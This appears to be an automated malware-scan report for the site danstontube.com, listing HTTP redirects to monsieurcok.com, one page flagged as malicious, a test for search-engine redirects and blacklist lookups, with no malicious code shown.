Scanned pages/files
Request | Server response | Status |
http://www.danstontube.com/ | HTTP/1.1 302 Found Connection: close Date: Thu, 08 Jan 2015 13:33:27 GMT Location: http://www.monsieurcok.com/dantontube/index.html Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.monsieurcok.com/dantontube/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 08 Jan 2015 13:33:27 GMT Location: http://www.monsieurcok.com/danstontube/index.html Server: Apache Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.monsieurcok.com/danstontube/index.html | 200 OK Content-Length: 9566 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://www.monsieurcok.com/test404page.js | 404 Not Found Content-Length: 458 Content-Type: text/html | clean |
http://www.monsieurcok.com/ | 200 OK Content-Length: 1473 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danstontube.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: danstontube.com
Referer: http://www.google.com/search?q=danstontube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danstontube.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://danstontube.com/
Result: danstontube.com is not infected or malware details are not published yet.